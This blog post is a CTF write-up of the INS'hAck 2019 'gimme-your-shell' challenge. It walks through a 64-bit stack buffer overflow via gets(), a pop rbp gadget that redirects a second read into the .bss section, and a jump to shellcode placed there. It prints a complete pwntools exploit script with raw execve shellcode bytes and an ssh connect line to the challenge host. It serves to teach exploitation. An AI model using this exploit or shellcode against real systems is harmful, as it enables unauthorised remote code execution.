<!DOCTYPE html>
<html lang="en-en">
  <head>
    
    <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="generator" content="Hugo 0.52 with theme Tranquilpeak 0.4.3-SNAPSHOT">
<meta name="author" content="Hugo VINCENT">
<meta name="keywords" content="pwn, reverse, blog, hacking, Privacy, vie-privée, insa, cybersecurity, infosec, hack">
<meta name="description" content="Event Challenge Category Points Solves     inshack-2019 gimme-your-shell pwn 50 67    TL;DR This is a remote buffer overflow challenge, there is no protection on the binary but ASLR is enable on the remote server. I redirected the execution flow to write my shellcode to a controled area, then jump to it and execute it.
Getting informations First I looked at the protections on the binary :">


<meta property="og:description" content="Event Challenge Category Points Solves     inshack-2019 gimme-your-shell pwn 50 67    TL;DR This is a remote buffer overflow challenge, there is no protection on the binary but ASLR is enable on the remote server. I redirected the execution flow to write my shellcode to a controled area, then jump to it and execute it.
Getting informations First I looked at the protections on the binary :">
<meta property="og:type" content="article">
<meta property="og:title" content="Give Me Your Shell">
<meta name="twitter:title" content="Give Me Your Shell">
<meta property="og:url" content="https://hug0vincent.github.io/2019/05/give-me-your-shell/">
<meta property="twitter:url" content="https://hug0vincent.github.io/2019/05/give-me-your-shell/">
<meta property="og:site_name" content="Hugo">
<meta property="og:description" content="Event Challenge Category Points Solves     inshack-2019 gimme-your-shell pwn 50 67    TL;DR This is a remote buffer overflow challenge, there is no protection on the binary but ASLR is enable on the remote server. I redirected the execution flow to write my shellcode to a controled area, then jump to it and execute it.
Getting informations First I looked at the protections on the binary :">
<meta name="twitter:description" content="Event Challenge Category Points Solves     inshack-2019 gimme-your-shell pwn 50 67    TL;DR This is a remote buffer overflow challenge, there is no protection on the binary but ASLR is enable on the remote server. I redirected the execution flow to write my shellcode to a controled area, then jump to it and execute it.
Getting informations First I looked at the protections on the binary :">
<meta property="og:locale" content="en-us">

  
    <meta property="article:published_time" content="2019-05-06T18:39:04">
  
  
    <meta property="article:modified_time" content="2019-05-06T18:39:04">
  
  
  
    
      <meta property="article:section" content="write-ups">
    
      <meta property="article:section" content="inshack-2019">
    
  
  
    
      <meta property="article:tag" content="pwn">
    
      <meta property="article:tag" content="reverse">
    
  


<meta name="twitter:card" content="summary">








  <meta property="og:image" content="https://hug0vincent.github.io/images/inshack-2019/bg.png">
  <meta property="twitter:image" content="https://hug0vincent.github.io/images/inshack-2019/bg.png">




  <meta property="og:image" content="https://hug0vincent.github.io/images/profil.jpg">
  <meta property="twitter:image" content="https://hug0vincent.github.io/images/profil.jpg">


    <title>Give Me Your Shell</title>

    <link rel="icon" href="https://hug0vincent.github.io/favicon.png">
    

    

    <link rel="canonical" href="https://hug0vincent.github.io/2019/05/give-me-your-shell/">

    
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css" integrity="sha256-eZrrJcwDc/3uDhsdt61sL2oOBY362qM3lon1gyExkL0=" crossorigin="anonymous" />
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/2.1.4/jquery.fancybox.min.css" integrity="sha256-vuXZ9LGmmwtjqFX1F+EKin1ThZMub58gKULUyf0qECk=" crossorigin="anonymous" />
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/2.1.4/helpers/jquery.fancybox-thumbs.min.css" integrity="sha256-SEa4XYAHihTcEP1f5gARTB2K26Uk8PsndQYHQC1f4jU=" crossorigin="anonymous" />
    

    
    <link href="https://fonts.googleapis.com/css?family=Montserrat:300,300i,400,700,700i&amp;subset=cyrillic,cyrillic-ext,latin-ext" rel="stylesheet"> 

    
    <link rel="stylesheet" href="https://hug0vincent.github.io/css/style-2wfjlq5nwe9qjygqo9yarila7qvjwdmv.min.css" />
    
    
      
        <link rel="stylesheet"  href="https://hug0vincent.github.io/css/custom.css">
      
    

    
      
    
    

    <script type="text/javascript">
      window.heap=window.heap||[],heap.load=function(e,t){window.heap.appid=e,window.heap.config=t=t||{};var r=t.forceSSL||"https:"===document.location.protocol,a=document.createElement("script");a.type="text/javascript",a.async=!0,a.src=(r?"https:":"http:")+"//cdn.heapanalytics.com/js/heap-"+e+".js";var n=document.getElementsByTagName("script")[0];n.parentNode.insertBefore(a,n);for(var o=function(e){return function(){heap.push([e].concat(Array.prototype.slice.call(arguments,0)))}},p=["addEventProperties","addUserProperties","clearEventProperties","identify","resetIdentity","removeEventProperty","setEventProperties","track","unsetEventProperty"],c=0;c<p.length;c++)heap[p[c]]=o(p[c])};
        heap.load("381812841");
  </script>
  </head>

  <body>
    <div id="blog">
      <header id="header" data-behavior="4">
  <i id="btn-open-sidebar" class="fa fa-lg fa-bars"></i>
  <div class="header-title">
    <a class="header-title-link" href="https://hug0vincent.github.io/">Hugo</a>
  </div>
  
    
      <a class="header-right-picture "
         href="https://hug0vincent.github.io/page/about/">
    
    
    
      
        <img class="header-picture" src="https://hug0vincent.github.io/images/profil.jpg" alt="Author&#39;s picture" />
      
    
    </a>
  
</header>

      <nav id="sidebar" data-behavior="4">
  <div class="sidebar-container">
    
      <div class="sidebar-profile">
        <a href="https://hug0vincent.github.io/page/about/">
          <img class="sidebar-profile-picture" src="https://hug0vincent.github.io/images/profil.jpg" alt="Author&#39;s picture" />
        </a>
        <h4 class="sidebar-profile-name">Hugo VINCENT</h4>
        
          <h5 class="sidebar-profile-bio">Student in computer security</h5>
        
      </div>
    
    <ul class="sidebar-buttons">
      
  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://hug0vincent.github.io/">
    
      <i class="sidebar-button-icon fa fa-lg fa-home"></i>
      
      <span class="sidebar-button-desc">Home</span>
    </a>
  </li>

  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://hug0vincent.github.io/categories/posts">
    
      <i class="sidebar-button-icon fa fa-lg fa-pencil"></i>
      
      <span class="sidebar-button-desc">Posts</span>
    </a>
  </li>

  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://hug0vincent.github.io/categories/write-ups">
    
      <i class="sidebar-button-icon fa fa-lg fa-bookmark"></i>
      
      <span class="sidebar-button-desc">Write-Ups</span>
    </a>
  </li>

  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://hug0vincent.github.io/tags">
    
      <i class="sidebar-button-icon fa fa-lg fa-tags"></i>
      
      <span class="sidebar-button-desc">Tags</span>
    </a>
  </li>

  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://hug0vincent.github.io/page/about/">
    
      <i class="sidebar-button-icon fa fa-lg fa-question"></i>
      
      <span class="sidebar-button-desc">About</span>
    </a>
  </li>


    </ul>
    <ul class="sidebar-buttons">
      
  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://github.com/Hug0Vincent" target="_blank" rel="noopener">
    
      <i class="sidebar-button-icon fa fa-lg fa-github"></i>
      
      <span class="sidebar-button-desc">GitHub</span>
    </a>
  </li>

  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://www.root-me.org/hugow?lang=fr#70a472fd3f9279cb9095ce7cbd2cad00" target="_blank" rel="noopener">
    
      <i class="sidebar-button-icon rootme_logo "></i>
      
      <span class="sidebar-button-desc">Root-me</span>
    </a>
  </li>

  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://twitter.com/hugow_vincent" target="_blank" rel="noopener">
    
      <i class="sidebar-button-icon fa fa-lg fa-twitter"></i>
      
      <span class="sidebar-button-desc">Twitter</span>
    </a>
  </li>

  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://www.instagram.com/hugo_vincent__/" target="_blank" rel="noopener">
    
      <i class="sidebar-button-icon fa fa-lg fa-instagram "></i>
      
      <span class="sidebar-button-desc">Instagram</span>
    </a>
  </li>


    </ul>
    <ul class="sidebar-buttons">
      

    </ul>
  </div>
</nav>

      
  <div class="post-header-cover
              text-left
              post-header-cover--full"
       style="background-image:url('/images/inshack-2019/bg.png')"
       data-behavior="4">
    
      <div class="post-header main-content-wrap text-left">
  
    <h1 class="post-title" itemprop="headline">
      Give Me Your Shell
    </h1>
  
  
  <div class="postShorten-meta post-meta">
    
      <time itemprop="datePublished" datetime="2019-05-06T18:39:04&#43;02:00">
        
  May 6, 2019

      </time>
    
    
  
  
    <span>in</span>
    
      <a class="category-link" href="https://hug0vincent.github.io/categories/write-ups">write-ups</a>, 
    
      <a class="category-link" href="https://hug0vincent.github.io/categories/inshack-2019">inshack-2019</a>
    
  

  </div>

</div>
    
  </div>


      <div id="main" data-behavior="4"
        class="hasCover
               hasCoverMetaIn
               ">
        <article class="post" itemscope itemType="http://schema.org/BlogPosting">
          
          
          <div class="post-content markdown" itemprop="articleBody">
            <div class="main-content-wrap">
              

<table>
<thead>
<tr>
<th align="center">Event</th>
<th align="center">Challenge</th>
<th align="center">Category</th>
<th align="center">Points</th>
<th align="center">Solves</th>
</tr>
</thead>

<tbody>
<tr>
<td align="center">inshack-2019</td>
<td align="center">gimme-your-shell</td>
<td align="center">pwn</td>
<td align="center">50</td>
<td align="center">67</td>
</tr>
</tbody>
</table>

<h1 id="tl-dr">TL;DR</h1>

<p>This is a remote buffer overflow challenge, there is no protection on the binary but ASLR is enable on the remote server. I redirected the execution flow to write my shellcode to a controled area, then jump to it and execute it.</p>

<h1 id="getting-informations">Getting informations</h1>

<p>First I looked at the protections on the binary :</p>



 
  
  
  
  
    
  
    
      
    
  
    
      
    
  

<div class="figure fig-100 center" >
  
    <a class="fancybox" href="https://hug0vincent.github.io/images/inshack-2019/protections.png" data-fancybox-group="">
  
    <img class="fig-img" src="https://hug0vincent.github.io/images/inshack-2019/protections.png" >
  
    </a>
  
  
</div>


<p>No protections is enabled but it&rsquo;s a remote challenge and we can assume that the ASLR is enabled on the remote server. Let keep that in mind and try to run the binary.</p>



 
  
  
  
  
    
  
    
      
    
  

<div class="figure fig-100" >
  
    <a class="fancybox" href="https://hug0vincent.github.io/images/inshack-2019/crash.png" data-fancybox-group="">
  
    <img class="fig-img" src="https://hug0vincent.github.io/images/inshack-2019/crash.png" >
  
    </a>
  
  
</div>


<p>The program crash when the input is to big. The binary is not stripped which means that we can find symbol inside the binary by opening it with ghidra we can easily spot the <span class="highlight-text orange">vuln</span> function which use a vulnerable function to get input from the user. Here <span class="highlight-text orange">gets</span> will read the user input from STDIN and the result will be stored in <span class="highlight-text orange">local_18</span> but there is no check on the size of the user input, we have our buffer overflow.</p>



 
  
  
  
  
    
  
    
      
    
  

<div class="figure fig-100" >
  
    <a class="fancybox" href="https://hug0vincent.github.io/images/inshack-2019/ghidra.png" data-fancybox-group="">
  
    <img class="fig-img" src="https://hug0vincent.github.io/images/inshack-2019/ghidra.png" >
  
    </a>
  
  
</div>


<h1 id="road-to-the-exploit">Road to the exploit</h1>

<p>Since ASLR is randomizing the stack addresses we can&rsquo;t find the address of our payload and jump to it. We could try to leak an address of libc and perform a ret2libc but I didn&rsquo;t use this technique because it&rsquo;s an 64 bits binary and there is no easy way to control the register <span class="highlight-text orange">rdi</span> which is used to pass the first arguments. So without a gadget to properly set <span class="highlight-text orange">rdi</span> we can&rsquo;t make a call to <span class="highlight-text orange">puts</span> with the address of <span class="highlight-text orange">gets</span> as parameter to leak it&rsquo;s address. But remember the NX bit is not set, here is a definition from wikipedia :</p>

<blockquote>
  <p>
An operating system with support for the NX bit may mark certain areas of memory as non-executable. The processor will then refuse to execute any code residing in these areas of memory. The general technique, known as executable space protection, is used to prevent certain types of malicious software from taking over computers by inserting their code into another program's data storage area and running their own code from within this section; one class of such attacks is known as the buffer overflow attack. 
</p>
  <footer>
    <strong></strong>
    
      
        <cite></cite>
      
    
  </footer>
</blockquote>

<p>So if it&rsquo;s disable we can write data and then execute what we write if it&rsquo;s a valid set of instructions. Now there are 2 problems to solve, where to write the shellcode and how to jump there.</p>

<p>We can see from the code in ghidra that the parameter of the <span class="highlight-text orange">gets</span> function depend of <span class="highlight-text orange">rdp</span></p>


  
  
  
  


<figure class="highlight assembly language-assembly">
  <figcaption>
    
  </figcaption>
  <table>
    <tbody>
      <tr>
        <td class="gutter">
          <pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre>
        </td>
        <td class="code">
          <pre class="code-highlight language-assembly"><code class="assembly">00400570 48 8d 45 f0     LEA        RAX=&gt;local_18,[RBP &#43; -0x10]
00400574 48 89 c7        MOV        RDI,RAX
00400577 e8 d4 fe        CALL       gets</code></pre>
        </td>
      </tr>
    </tbody>
  </table>
</figure>

<p>By chance there is a <a href="https://thinkloveshare.com/en/hacking/pwn_3of4_saperliropette/">gadget</a> which allow us to set a crafted value in <span class="highlight-text orange">rbp</span> :</p>


  
  
  
  


<figure class="highlight assembly language-assembly">
  <figcaption>
    
  </figcaption>
  <table>
    <tbody>
      <tr>
        <td class="gutter">
          <pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre>
        </td>
        <td class="code">
          <pre class="code-highlight language-assembly"><code class="assembly">ROPgadget --binary weak
[...]
0x0000000000400522 : pop rbp ; ret
[...]</code></pre>
        </td>
      </tr>
    </tbody>
  </table>
</figure>

<p>You can use the readelf command to list sections of the binary and their differents rights, we can see that the <span class="highlight-text orange">.bss</span> section has write (W) right, it&rsquo;s a perfect candidate to host our shellcode.

  
  
  
  


<figure class="highlight assembly language-assembly">
  <figcaption>
    
  </figcaption>
  <table>
    <tbody>
      <tr>
        <td class="gutter">
          <pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre>
        </td>
        <td class="code">
          <pre class="code-highlight language-assembly"><code class="assembly">readelf -S weak
[...]
[25] .bss              NOBITS           0000000000600a18  00000a18
    0000000000000010  0000000000000000  WA       0     0     8
[...]</code></pre>
        </td>
      </tr>
    </tbody>
  </table>
</figure></p>

<p>We also have to see where the program crash, I use gdb with the peda extention which allow me to create patterns and search for them :</p>


  
  
  
  


<figure class="highlight assembly language-assembly">
  <figcaption>
    
  </figcaption>
  <table>
    <tbody>
      <tr>
        <td class="gutter">
          <pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre>
        </td>
        <td class="code">
          <pre class="code-highlight language-assembly"><code class="assembly">gdb ./weak
gdb-peda$ pattern_create 30
&#39;AAA%AAsAABAA$AAnAACAA-AA(AADAA&#39;
gdb-peda$ r </code></pre>
        </td>
      </tr>
    </tbody>
  </table>
</figure>



 
  
  
  
  
    
  
    
      
    
  

<div class="figure fig-100" >
  
    <a class="fancybox" href="https://hug0vincent.github.io/images/inshack-2019/crash-peda.png" data-fancybox-group="">
  
    <img class="fig-img" src="https://hug0vincent.github.io/images/inshack-2019/crash-peda.png" >
  
    </a>
  
  
</div>


<p>Perfect we can control <span class="highlight-text orange">rip</span> which is the instuction pointer at offset 24.</p>

<h1 id="building-the-exploit">Building the exploit</h1>

<p>So here is the plan :</p>

<ul>
<li>overflow the program until rip</li>
<li>use the previous gadget to set rbp with a controlled value in bss</li>
<li>ret to the code in vuln to make a second call to get</li>
<li>send our shellcode which will be in bss</li>
<li>jump to our controlled area in bss</li>
</ul>


  
    
  
  
    
  
  
  


<figure class="highlight python language-python">
  <figcaption>
    
      <span>exploit.py</span>
    
  </figcaption>
  <table>
    <tbody>
      <tr>
        <td class="gutter">
          <pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre>
        </td>
        <td class="code">
          <pre class="code-highlight language-python"><code class="python">from pwn import *

s = process(&#34;./connect.sh&#34;, shell=True)

shell = &#34;\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05&#34;

bss = 0x0600b00                                         # bss WX permissions
offset = 24

stage1 = &#34;&#34;
stage1 &#43;= &#34;A&#34; * offset
stage1 &#43;= p64(0x0400522)                                # pop rbp
stage1 &#43;= p64(bss &#43; 0x10)
stage1 &#43;= p64(0x0400570)                                # back to vuln

print s.recvuntil(&#34;president.\n&#34;).strip()

s.sendline(stage1)

print s.recvuntil(&#34;remember !\n&#34;).strip()

stage2 = &#34;&#34;
stage2 &#43;= &#34;A&#34; * offset
stage2 &#43;= p64(0x0600b00 &#43;32)                            # 32 is the lenght of the offset plus the
stage2 &#43;= shell                                         #lenght of the 0x0600b00 address

s.sendline(stage2)

print s.recvuntil(&#34;remember !\n&#34;).strip()
s.interactive()</code></pre>
        </td>
      </tr>
    </tbody>
  </table>
</figure>


  
    
  
  
    
  
  
  


<figure class="highlight bash language-bash">
  <figcaption>
    
      <span>connect.sh</span>
    
  </figcaption>
  <table>
    <tbody>
      <tr>
        <td class="gutter">
          <pre><span class="line">1</span><br></pre>
        </td>
        <td class="code">
          <pre class="code-highlight language-bash"><code class="bash">ssh -i ../key.pub -p 2225 user@gimme-your-shell.ctf.insecurity-insa.fr</code></pre>
        </td>
      </tr>
    </tbody>
  </table>
</figure>

<h1 id="flag">Flag</h1>

<span class="highlight-text red">INSA{YoU_h4v3_a_b34uT1fUL_Sh33lc0d3}</span>

              
            </div>
          </div>
          <div id="post-footer" class="post-footer main-content-wrap">
            
              
                
                
                  <div class="post-footer-tags">
                    <span class="text-color-light text-small">TAGGED IN</span><br/>
                    
  <a class="tag tag--primary tag--small" href="https://hug0vincent.github.io/tags/pwn/">pwn</a>

  <a class="tag tag--primary tag--small" href="https://hug0vincent.github.io/tags/reverse/">reverse</a>

                  </div>
                
              
            
            <div class="post-actions-wrap">
  
      <nav >
        <ul class="post-actions post-action-nav">
          
            <li class="post-action">
              
                <a class="post-action-btn btn btn--disabled">
              
                  <i class="fa fa-angle-left"></i>
                  <span class="hide-xs hide-sm text-small icon-ml">NEXT</span>
                </a>
            </li>
            <li class="post-action">
              
                <a class="post-action-btn btn btn--default tooltip--top" href="https://hug0vincent.github.io/2018/12/mission-impossible-1/" data-tooltip="Mission impossible 1">
              
                  <span class="hide-xs hide-sm text-small icon-mr">PREVIOUS</span>
                  <i class="fa fa-angle-right"></i>
                </a>
            </li>
          
        </ul>
      </nav>
    <ul class="post-actions post-action-share" >
      
        <li class="post-action hide-lg hide-md hide-sm">
          <a class="post-action-btn btn btn--default btn-open-shareoptions" href="#btn-open-shareoptions">
            <i class="fa fa-share-alt"></i>
          </a>
        </li>
        
          <li class="post-action hide-xs">
            <a class="post-action-btn btn btn--default" target="new" href="https://www.facebook.com/sharer/sharer.php?u=https://hug0vincent.github.io/2019/05/give-me-your-shell/">
              <i class="fa fa-facebook-official"></i>
            </a>
          </li>
        
          <li class="post-action hide-xs">
            <a class="post-action-btn btn btn--default" target="new" href="https://twitter.com/intent/tweet?text=https://hug0vincent.github.io/2019/05/give-me-your-shell/">
              <i class="fa fa-twitter"></i>
            </a>
          </li>
        
      
      
        <li class="post-action">
          <a class="post-action-btn btn btn--default" href="#disqus_thread">
            <i class="fa fa-comment-o"></i>
          </a>
        </li>
      
      <li class="post-action">
        
          <a class="post-action-btn btn btn--default" href="#">
        
          <i class="fa fa-list"></i>
        </a>
      </li>
    </ul>
  
</div>

            
              
                <div id="disqus_thread">
  <noscript>Please enable JavaScript to view the <a href="//disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
</div>
              
            
          </div>
        </article>
        <footer id="footer" class="main-content-wrap">
  <span class="copyrights">
    &copy; 2019 Hugo VINCENT. All Rights Reserved
  </span>
</footer>

      </div>
      <div id="bottom-bar" class="post-bottom-bar" data-behavior="4">
        <div class="post-actions-wrap">
  
      <nav >
        <ul class="post-actions post-action-nav">
          
            <li class="post-action">
              
                <a class="post-action-btn btn btn--disabled">
              
                  <i class="fa fa-angle-left"></i>
                  <span class="hide-xs hide-sm text-small icon-ml">NEXT</span>
                </a>
            </li>
            <li class="post-action">
              
                <a class="post-action-btn btn btn--default tooltip--top" href="https://hug0vincent.github.io/2018/12/mission-impossible-1/" data-tooltip="Mission impossible 1">
              
                  <span class="hide-xs hide-sm text-small icon-mr">PREVIOUS</span>
                  <i class="fa fa-angle-right"></i>
                </a>
            </li>
          
        </ul>
      </nav>
    <ul class="post-actions post-action-share" >
      
        <li class="post-action hide-lg hide-md hide-sm">
          <a class="post-action-btn btn btn--default btn-open-shareoptions" href="#btn-open-shareoptions">
            <i class="fa fa-share-alt"></i>
          </a>
        </li>
        
          <li class="post-action hide-xs">
            <a class="post-action-btn btn btn--default" target="new" href="https://www.facebook.com/sharer/sharer.php?u=https://hug0vincent.github.io/2019/05/give-me-your-shell/">
              <i class="fa fa-facebook-official"></i>
            </a>
          </li>
        
          <li class="post-action hide-xs">
            <a class="post-action-btn btn btn--default" target="new" href="https://twitter.com/intent/tweet?text=https://hug0vincent.github.io/2019/05/give-me-your-shell/">
              <i class="fa fa-twitter"></i>
            </a>
          </li>
        
      
      
        <li class="post-action">
          <a class="post-action-btn btn btn--default" href="#disqus_thread">
            <i class="fa fa-comment-o"></i>
          </a>
        </li>
      
      <li class="post-action">
        
          <a class="post-action-btn btn btn--default" href="#">
        
          <i class="fa fa-list"></i>
        </a>
      </li>
    </ul>
  
</div>

      </div>
      <div id="share-options-bar" class="share-options-bar" data-behavior="4">
  <i id="btn-close-shareoptions" class="fa fa-close"></i>
  <ul class="share-options">
    
      <li class="share-option">
        <a class="share-option-btn" target="new" href="https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Fhug0vincent.github.io%2F2019%2F05%2Fgive-me-your-shell%2F">
          <i class="fa fa-facebook-official"></i><span>Share on Facebook</span>
        </a>
      </li>
    
      <li class="share-option">
        <a class="share-option-btn" target="new" href="https://twitter.com/intent/tweet?text=https%3A%2F%2Fhug0vincent.github.io%2F2019%2F05%2Fgive-me-your-shell%2F">
          <i class="fa fa-twitter"></i><span>Share on Twitter</span>
        </a>
      </li>
    
  </ul>
</div>
<div id="share-options-mask" class="share-options-mask"></div>
    </div>
    
    <div id="about">
  <div id="about-card">
    <div id="about-btn-close">
      <i class="fa fa-remove"></i>
    </div>
    
      <img id="about-card-picture" src="https://hug0vincent.github.io/images/profil.jpg" alt="Author&#39;s picture" />
    
    <h4 id="about-card-name">Hugo VINCENT</h4>
    
      <div id="about-card-bio">Student in computer security</div>
    
    
      <div id="about-card-job">
        <i class="fa fa-briefcase"></i>
        <br/>
        Student at INSA / SIF master
      </div>
    
    
      <div id="about-card-location">
        <i class="fa fa-map-marker"></i>
        <br/>
        France
      </div>
    
  </div>
</div>

    <div id="algolia-search-modal" class="modal-container">
  <div class="modal">
    <div class="modal-header">
      <span class="close-button"><i class="fa fa-close"></i></span>
      <a href="https://algolia.com" target="_blank" rel="noopener" class="searchby-algolia text-color-light link-unstyled">
        <span class="searchby-algolia-text text-color-light text-small">by</span>
        <img class="searchby-algolia-logo" src="https://www.algolia.com/static_assets/images/press/downloads/algolia-light.svg">
      </a>
      <i class="search-icon fa fa-search"></i>
      <form id="algolia-search-form">
        <input type="text" id="algolia-search-input" name="search"
          class="form-control input--large search-input" placeholder="Search" />
      </form>
    </div>
    <div class="modal-body">
      <div class="no-result text-color-light text-center">no post found</div>
      <div class="results">
        
        
          <div class="media">
            
            <div class="media-body">
              <a class="link-unstyled" href="https://hug0vincent.github.io/2019/05/give-me-your-shell/">
                <h3 class="media-heading">Give Me Your Shell</h3>
              </a>
              <span class="media-meta">
                <span class="media-date text-small">
                  May 5, 2019
                </span>
              </span>
              <div class="media-content hide-xs font-merryweather">Event Challenge Category Points Solves     inshack-2019 gimme-your-shell pwn 50 67    TL;DR This is a remote buffer overflow challenge, there is no protection on the binary but ASLR is enable on the remote server. I redirected the execution flow to write my shellcode to a controled area, then jump to it and execute it.
Getting informations First I looked at the protections on the binary :</div>
            </div>
            <div style="clear:both;"></div>
            <hr>
          </div>
        
          <div class="media">
            
            <div class="media-body">
              <a class="link-unstyled" href="https://hug0vincent.github.io/2018/12/mission-impossible-1/">
                <h3 class="media-heading">Mission impossible 1</h3>
              </a>
              <span class="media-meta">
                <span class="media-date text-small">
                  Dec 12, 2018
                </span>
              </span>
              <div class="media-content hide-xs font-merryweather">Event Challenge Category Points Solves     santhacklausctf mi1 Forensic/Crypto 800 18    TL;DR After downloading the zip file we were faced with a linux memory dump. After building the correct profile for volatility you had to perform a known plain text attack on an encrypted and splited zip file to recover the file flag.txt.
Introduction After downloading the file MI1.zip we had a memdump.</div>
            </div>
            <div style="clear:both;"></div>
            <hr>
          </div>
        
          <div class="media">
            
            <div class="media-body">
              <a class="link-unstyled" href="https://hug0vincent.github.io/2018/12/mission-impossible-2/">
                <h3 class="media-heading">Mission impossible 2</h3>
              </a>
              <span class="media-meta">
                <span class="media-date text-small">
                  Dec 12, 2018
                </span>
              </span>
              <div class="media-content hide-xs font-merryweather">Event Challenge Category Points Solves     santhacklausctf mi2 Forensic/Crypto/network 500 22    TL;DR In the second part of the challenge we also had a memory dump of a Debian system and a network capture. When you analyse the network capture you can see that some data were exfiltrated, if you look into the memdup you can see that the tool DET (Data Exfiltration Toolkit), has been used to exfiltrate the data.</div>
            </div>
            <div style="clear:both;"></div>
            <hr>
          </div>
        
      </div>
    </div>
    <div class="modal-footer">
      <p class="results-count text-medium"
         data-message-zero="no post found"
         data-message-one="1 post found"
         data-message-other="{n} posts found">
         3 posts found
      </p>
    </div>
  </div>
</div>
    
  
    
    <div id="cover" style="background-image:url('https://hug0vincent.github.io/images/bg2.jpg');"></div>
  


    
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js" integrity="sha256-BbhdlvQf/xTY9gja0Dq3HiwQF8LaCRTXxZKRutelT44=" crossorigin="anonymous"></script>

  <script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/9.12.0/highlight.min.js" integrity="sha256-/BfiIkHlHoVihZdc6TFuj7MmJ0TWcWsMXkeDFwhi0zw=" crossorigin="anonymous"></script>

<script src="https://cdnjs.cloudflare.com/ajax/libs/fancybox/2.1.7/js/jquery.fancybox.min.js" integrity="sha256-GEAnjcTqVP+vBp3SSc8bEDQqvWAZMiHyUSIorrWwH50=" crossorigin="anonymous"></script>


<script src="https://hug0vincent.github.io/js/script-hbdqx7wlhrscaipt6txjo74wihw1bagwt97hjgdefg9y8kq3xpotphkbsilg.min.js"></script>


<script lang="javascript">
window.onload = updateMinWidth;
window.onresize = updateMinWidth;
document.getElementById("sidebar").addEventListener("transitionend", updateMinWidth);
function updateMinWidth() {
  var sidebar = document.getElementById("sidebar");
  var main = document.getElementById("main");
  main.style.minWidth = "";
  var w1 = getComputedStyle(main).getPropertyValue("min-width");
  var w2 = getComputedStyle(sidebar).getPropertyValue("width");
  var w3 = getComputedStyle(sidebar).getPropertyValue("left");
  main.style.minWidth = `calc(${w1} - ${w2} - ${w3})`;
}
</script>

<script>
$(document).ready(function() {
  hljs.configure({ classPrefix: '', useBR: false });
  $('pre.code-highlight > code, pre > code').each(function(i, block) {
    if (!$(this).hasClass('codeblock')) {
      $(this).addClass('codeblock');
    }
    hljs.highlightBlock(block);
  });
});
</script>


  
    
      <script>
        var disqus_config = function () {
          this.page.url = 'https:\/\/hug0vincent.github.io\/2019\/05\/give-me-your-shell\/';
          
            this.page.identifier = '\/2019\/05\/give-me-your-shell\/'
          
        };
        (function() {
          
          
          if (window.location.hostname == "localhost") {
            return;
          }
          var d = document, s = d.createElement('script');
          var disqus_shortname = 'https-hug0vincent-github-io';
          s.src = '//' + disqus_shortname + '.disqus.com/embed.js';

          s.setAttribute('data-timestamp', +new Date());
          (d.head || d.body).appendChild(s);
        })();
      </script>
    
  




    
  </body>
</html>

